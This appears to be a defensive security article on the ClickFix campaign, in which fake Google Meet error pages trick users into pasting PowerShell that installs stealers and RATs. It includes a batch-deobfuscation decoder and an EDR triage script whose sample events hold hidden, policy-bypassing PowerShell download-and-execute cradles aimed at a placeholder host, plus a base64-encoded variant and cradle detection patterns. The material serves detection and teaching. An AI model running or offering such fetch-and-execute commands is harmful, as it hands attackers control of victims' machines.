Fake Google Meet pages deliver PowerShell malware

A new social engineering campaign, dubbed "ClickFix," exploits user trust in Google Meet. It uses convincing fake meeting pages to trick victims into running malicious commands themselves: a PowerShell one-liner on Windows, with a parallel lure aimed at macOS users. Because the victim performs the execution rather than a downloaded file, the campaign sidesteps many controls that key on attachments and downloads.

The campaign begins with phishing emails whose links are crafted to look like genuine Google Meet invitations. Users who click them are redirected to fraudulent pages that closely replicate the familiar Google Meet interface.

Instead of prompting for login credentials, the malicious site displays a fabricated error, typically a "Microphone Permission Denied" alert. To "fix" this non-existent problem, the user is instructed to copy a supplied PowerShell command, paste it into a terminal or the Windows Run dialog, and press Enter.

The technical deception relies on a JavaScript function embedded in the fake page. When the user clicks the "fix" button, it silently writes the malicious PowerShell command to the clipboard, so the victim only has to paste.

Once executed, the command fetches and runs the attackers' next stage, effectively handing them control of the machine. The initial payload often displays a reassuring "Verification complete!" message box via [System.Windows.Forms.MessageBox]::Show() so the victim believes the fix worked while the malicious stages run in the background.


Subsequent stages download additional obfuscated batch files (such as noanti-vm.bat). Rather than containing readable commands, these files define environment variables with junk values and then rebuild each command from substrings of them using cmd.exe's %VAR:~offset,length% syntax, so the real commands never appear in the file's plain text and simple string matching fails:

%UMOGM:~2,1%%FkYBZvOHArkFVTJLVCDt:~6,1%%ZeGUDpukA:~2,1%...

This decodes to:

SeTLOCaL EnableDeLayEDEXpaNSion

The random capitalisation is cosmetic, since cmd.exe commands are case-insensitive; enabling delayed expansion lets later lines reference variables with !VAR! so the rest of the script can be reconstructed the same way.
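To see how this style of obfuscation is undone, here is a small decoder, added for this article and not taken from the malware or from the original page. It reads the `set` definitions from a batch script, then expands `%VAR:~offset,length%` references (including negative offsets, omitted lengths and the delayed-expansion `!VAR!` form) following cmd.exe's substring rules. The script it decodes is constructed for the example, with invented variable names and values arranged so that the expansion reproduces the `SeTLOCaL EnableDeLayEDEXpaNSion` line above; the real noanti-vm.bat definitions are not reproduced on the page.

```python
import re
from typing import Dict, List, Optional

# Constructed sample in the style of the noanti-vm.bat stage described above.
# Variable names and values are invented for this example; the real file's
# definitions are not reproduced on the page.
SAMPLE_BAT = r"""@echo off
set KJQWE=zSeTLOC
set "zxcvbnmLKJ=aL Enab"
set PoIuYtR=leDeLay
set qaZwSx=EDEXpaN
set mNbVcX=Sion!?
%KJQWE:~-6,3%%KJQWE:~4,2%%KJQWE:~6,1%%zxcvbnmLKJ:~0,2%%zxcvbnmLKJ:~2,1%%zxcvbnmLKJ:~3,4%%PoIuYtR:~0,7%%qaZwSx:~0,4%%qaZwSx:~4,3%%mNbVcX:~0,-2%
"""

# `set NAME=VALUE` and the quoted `set "NAME=VALUE"` form (trailing spaces are
# significant to cmd.exe but are dropped here for simplicity).
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
# %VAR%, %VAR:~start%, %VAR:~start,len% and the delayed-expansion !VAR...! form.
EXPAND_RE = re.compile(r"([%!])([^%!:\s]+)(?::~(-?\d+)(?:,(-?\d+))?)?\1")


def substring(value: str, start: Optional[str], length: Optional[str]) -> str:
    """Apply cmd.exe %VAR:~start,len% rules: a negative start counts back from
    the end of the value, a negative len drops that many characters from the end,
    and an omitted len means 'to the end'."""
    n = len(value)
    if start is None:
        return value
    s = int(start)
    s = max(0, n + s) if s < 0 else min(s, n)
    if length is None:
        return value[s:]
    ln = int(length)
    end = n + ln if ln < 0 else s + ln
    return value[s:end] if end > s else ""


def deobfuscate(script: str) -> List[str]:
    """Record every `set` assignment, then expand the variable references on all
    other lines. Inserted values are not re-expanded, which is how cmd.exe treats
    %...% references on a single line."""
    env: Dict[str, str] = {}
    decoded: List[str] = []
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            env[m.group(1).upper()] = m.group(2)  # variable names are case-insensitive
            continue

        def repl(mo):
            name = mo.group(2).upper()
            if name not in env:
                return mo.group(0)  # leave unknown references untouched
            return substring(env[name], mo.group(3), mo.group(4))

        expanded = EXPAND_RE.sub(repl, line)
        if expanded.strip():
            decoded.append(expanded)
    return decoded


if __name__ == "__main__":
    for decoded_line in deobfuscate(SAMPLE_BAT):
        print(decoded_line)
```

Running it prints the pass-through `@echo off` line followed by the reconstructed `SeTLOCaL EnableDeLayEDEXpaNSion`. On a real sample the same approach is applied iteratively: decode one layer, feed the output back in, and repeat until the download or execution commands appear in clear text.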

The end goal is to install remote access trojans (RATs) and information stealers. Payloads observed include AsyncRAT, StealC, Rhadamanthys, Lumma Stealer and DarkGate on Windows, and Atomic Stealer (AMOS) on macOS. They let the operators exfiltrate credentials and other sensitive data, maintain persistence on the system, and move laterally within the network.

Behind the Attack: Threat Actors & Their Tactics

What makes ClickFix effective is that the victim, not a dropped file, performs the execution. The browser never downloads an executable, so there is nothing for email attachment scanning, download scanning or Mark-of-the-Web based controls to act on; the only artefacts are a clipboard write in the browser and a PowerShell process started from the Run dialog or a terminal by the logged-on user, which many tools tuned for automated script execution or file downloads do not flag.

Investigations have attributed the infrastructure behind this campaign to organised "traffer" groups (traffic-distribution crews that funnel victims to malware) known as Slavic Nation Empire and Scamquerteo. These groups share templates and backend resources, which lets them scale the same lure across multiple industries. Campaigns using these tactics have been observed since as early as March 2024.

Recommended Mitigation Actions

Cybersecurity experts are urging organisations and individuals to adopt the following mitigations:

  • Enforce PowerShell Execution Policies and Language Constraints: Configure systems to run only signed scripts, but treat execution policy as a baseline rather than a security boundary. It does not stop a command pasted interactively, and attackers routinely add -ExecutionPolicy Bypass to the command line. Pair it with Constrained Language Mode and enable script block logging (Event ID 4104) so the decoded command content is recorded.
  • Employ Application Controls: Use AppLocker or Windows Defender Application Control to restrict unauthorised programs on endpoints, block PowerShell for users who have no need for it, and consider removing the Run dialog via Group Policy where that is acceptable.
  • Comprehensive User Training: Educate users on recognising social engineering, suspicious meeting invitations, and the danger of pasting commands from untrusted sources. Emphasise that no legitimate service will ever ask a user to fix a problem by running a PowerShell command taken from a web page or email.
  • Web Content Filtering: Block access to known malicious domains associated with these campaigns.
  • Regular System Scanning: Continuously monitor systems for unauthorised scripts and malware.
  • Endpoint Detection and Response (EDR) Solutions: Use EDR tools that capture PowerShell command lines and script block content, and alert on shells launched from explorer.exe with hidden-window, bypass, encoded-command or download-cradle arguments.
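As an added illustration of the EDR point, not part of the original article: a triage routine that scores process-creation events (Sysmon Event ID 1 style fields, constructed here rather than captured) for the pattern a ClickFix paste produces, namely a shell started under explorer.exe with hidden-window, policy-bypass, encoded or download-cradle arguments. It decodes -EncodedCommand blobs before matching, so an encoded cradle is caught the same way as a plain one. The paths and command lines are invented for the example, and example.invalid is a reserved name rather than a real domain.

```python
import base64
import re
from typing import Dict, List

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real
# telemetry. Events 0 and 3 model a ClickFix paste, where Win+R launches the
# shell with explorer.exe as its parent; events 1 and 2 are benign look-alikes.
ENCODED = base64.b64encode(
    "iex (irm https://example.invalid/verify)".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell.exe -w hidden -ep bypass -nop -c "iex (irm https://example.invalid/verify)"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"cmd.exe /c powershell -w h -e {ENCODED}"},
]

INTERACTIVE_PARENTS = {"explorer.exe"}  # Run dialog or desktop-launched shells
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "policy_bypass":   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "no_profile":      re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": ENCODED_RE,
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
        r"downloadstring|downloadfile)\b", re.I),
}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """-EncodedCommand carries UTF-16LE text in base64; decode it so the cradle
    pattern is matched on the real command rather than on the blob."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def analyze(event: Dict[str, str]) -> Dict[str, object]:
    """Return the matched indicators, the decoded command (if any) and a verdict.
    Flag only when an interactive parent launched a shell AND at least two
    indicators hit, so an admin's scheduled -ExecutionPolicy Bypass script or a
    user simply opening PowerShell does not trigger."""
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    interactive = (_basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS
                   and _basename(event.get("Image", "")) in SHELLS)
    return {"indicators": hits, "decoded": decoded,
            "flagged": interactive and len(hits) >= 2}


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print("FLAG " if verdict["flagged"] else "ok   ", verdict["indicators"], ev["CommandLine"][:60])
```

Two tuning notes: a PowerShell window opened through Windows Terminal has WindowsTerminal.exe rather than explorer.exe as its parent, so extend INTERACTIVE_PARENTS to match how users actually reach a shell in your environment, and measure the two-indicator threshold against a week of benign telemetry before alerting on it.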

The stark reality is that a single, seemingly innocuous action, copying and pasting a command from an untrusted source, can lead to complete system compromise. As these social engineering lures become more convincing, ongoing user education combined with layered technical controls remains essential in defending against them.